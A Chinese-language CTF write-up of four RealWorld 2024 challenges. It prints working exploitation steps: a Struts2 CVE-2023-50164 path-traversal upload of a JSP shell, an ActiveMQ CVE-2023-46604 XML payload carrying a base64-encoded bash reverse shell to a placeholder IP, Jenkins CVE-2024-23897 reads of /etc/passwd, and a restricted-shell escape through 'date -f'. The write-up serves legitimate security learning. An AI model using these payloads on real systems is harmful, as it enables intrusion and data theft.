RealWorld 2024 Writeup

5 min read

写在前面

闲来无事,报名了只有国际赛40%左右难度的体验赛,简单看了看题目,嗯,一题不会。不过后面想了想 Real World 应该都是考察最近的 CVE,最终做了 4 题,排名还很靠前,感觉还可以。另外 Be-an-Interpreter-Hacker 应该是 CVE-2023-28879 但是未成功…

vision

This is the debug console of an IoT device. The device is not intended to provide the shell. For debugging purposes, the vendor provides a protected shell to execute basic debug commands. Are you able to access the unrestricted shell for this device?

访问环境,要求爆破 sha256,思索半天写不出,突然发现给了爆破脚本 WinMin/solve.py

image-20240129090852434

连接新给的地址后输入 help 发现只能执行部分命令,IDA 分析半天没看懂,突然想起来文件读取时候,date 有个骚操作,可能这题非预期了

┌──(kali㉿kali)-[~/Desktop]
└─$ nc  -v 47.96.229.249 34567
47.96.229.249: inverse host lookup failed: Unknown host
(UNKNOWN) [47.96.229.249] 34567 (?) open
Welcome to the debug console! Use "help" to see supported commands.
$ help
Supported commands: ping, uname, pwd, date, whoami, poweroff, id, showKey, openthedoor
$ date -f /flag
date: invalid date 'rwctf{tH1s_1z_th3_Fl4q_f0R_v1s10N_3D025DF9-B8}'

Be-More-Elegant

Grace Under Code, Be gentle please :)

发现上传地址后缀为 action,猜测极大可能是考察 struts2 漏洞,后通过提供的题目源码证实了这一点。

image-20240129090226293

这里贴一下上传部分的代码,通过检索近期的 Struts2 文件上传漏洞,得到 S2-066(CVE-2023-50164),直接进行复现即可。

package be.more.elegant;

import com.opensymphony.xwork2.ActionSupport;
import java.io.File;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import javax.servlet.http.HttpServletRequest;
import org.apache.commons.io.FileUtils;
import org.apache.struts2.action.ServletRequestAware;

public class HeaderIconAction extends ActionSupport implements ServletRequestAware {
  public static final File UPLOAD_DIR = new File(HeaderIconAction.class.getClassLoader().getResource("../../statics/").getFile(), "uploads");
  
  private HttpServletRequest request;
  
  private String uploadedPath;
  
  private File fileUpload;
  
  private String fileUploadContentType;
  
  private String fileUploadFileName;
  
  public String execute() throws Exception {
    return "input";
  }
  
  public String doUpload() {
    try {
      String remoteAddr = this.request.getRemoteAddr();
      String md5ForIp = md5Ip(remoteAddr);
      File sandBox = new File(UPLOAD_DIR, md5ForIp);
      File fileToCreate = new File(sandBox, this.fileUploadFileName);
      FileUtils.copyFile(this.fileUpload, fileToCreate);
      this.uploadedPath = "statics/uploads/" + md5ForIp + "/" + this.fileUploadFileName;
    } catch (Exception e) {
      return "error";
    } 
    return "success";
  }
  
  public String md5Ip(String ip) throws NoSuchAlgorithmException {
    MessageDigest md = MessageDigest.getInstance("MD5");
    md.update(ip.getBytes());
    byte[] digest = md.digest();
    StringBuilder sb = new StringBuilder();
    for (byte b : digest) {
      sb.append(String.format("%02x", new Object[] { Integer.valueOf(b & 0xFF) }));
    } 
    return sb.toString();
  }
  
  public File getFileUpload() {
    return this.fileUpload;
  }
  
  public void setFileUpload(File fileUpload) {
    this.fileUpload = fileUpload;
  }
  
  public String getFileUploadContentType() {
    return this.fileUploadContentType;
  }
  
  public void setFileUploadContentType(String fileUploadContentType) {
    this.fileUploadContentType = fileUploadContentType;
  }
  
  public String getFileUploadFileName() {
    return this.fileUploadFileName;
  }
  
  public void setFileUploadFileName(String fileUploadFileName) {
    this.fileUploadFileName = fileUploadFileName;
  }
  
  public String getUploadedPath() {
    return this.uploadedPath;
  }
  
  public void withServletRequest(HttpervletRequest httpServletRequest) {
    this.request = httpServletRequest;
  }
}

image

注意发包前,FileUpload 先改为 fileUpload 使之正常上传一个文件后,在改回来即可。

POST http://47.99.57.31:8080/upload.action HTTP/1.1
Host: 47.99.57.31:8080
Content-Length: 348
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryarkq65pU6vLl6wRP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Connection: close

------WebKitFormBoundaryarkq65pU6vLl6wRP
Content-Disposition: form-data; name="FileUpload"; filename="a.txt"
Content-Type: image/jpeg

{shell}
------WebKitFormBoundaryarkq65pU6vLl6wRP
Content-Disposition: form-data; name="fileUploadFileName"; 
Content-Type: text/plain

../../../views/xxxxxx.jsp
------WebKitFormBoundaryarkq65pU6vLl6wRP--

Be-an-ActiveMq-Hacker

Welcome, seekers, to the game, Where ActiveMQ’s name is not the same. In this world of messages and queues, A hidden flaw, in the news.

CVE-2023-46604, a code that’s key, A vulnerability, you’ll soon see. In this challenge, you are tasked, To uncover secrets, masked and masked.

Explore the depths of ActiveMQ’s lair, Where messages flow with utmost care. But within this stream, a flaw does lie, A door unlocked, beneath the sky.

Your mission, should you dare to dive, Is to find this flaw, make it alive. Exploit the gap, show your skill, In this cyber world, where time stands still.

This is your chance to learn and probe, In a digital world across the globe. Seek the flaw in ActiveMQ’s core, And open the door to cybersecurity lore.

So embark on this quest, both far and nigh, Where codes and messages, in layers lie. Find the key to CVE’s mystery, And etch your name in cyber history!

题目描述中已经明确给出了漏洞编号,直接利用即可 sule01u/CVE-2023-46604

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC95b3VyX2lwLzUwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

我们直接反弹shell,即可得到flag

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvp 5000
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5000
Ncat: Listening on 0.0.0.0:5000
Ncat: Connection from 120.26.63.137.
Ncat: Connection from 120.26.63.137:33094.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell

activemq@76390a168383:~$ cd /
activemq@76390a168383:/$ ./readflag
rwctf{N0w_Y0ur_4r3_G0od_H4ck3r_6d6}

Be-a-Security-Researcher

Participate in a security vulnerability emergency response

访问环境,明确写出了用的 Jenkins。一般来讲,像比赛的话大都只会考察 命令执行 或 文件读取 漏洞,找了一下近期的漏洞,发现一个比较符合的 CVE-2024-23897

image-20240129090322464

┌──(kali㉿kali)-[~/Desktop]
└─$ java -jar .\jenkins-cli.jar -s http://47.96.171.129:8080/ who-am-i "@/etc/passwd"

ERROR: No argument is allowed: root:x:0:0:root:/root:/bin/bash
java -jar jenkins-cli.jar who-am-i
Reports your credential and permissions.

┌──(kali㉿kali)-[~/Desktop]
└─$ java -jar .\jenkins-cli.jar -s http://47.96.171.129:8080/ who-am-i "@/flag"

ERROR: No argument is allowed: rwctf{jenkins_no_vulner!!}
java -jar jenkins-cli.jar who-am-i
Reports your credential and permissions.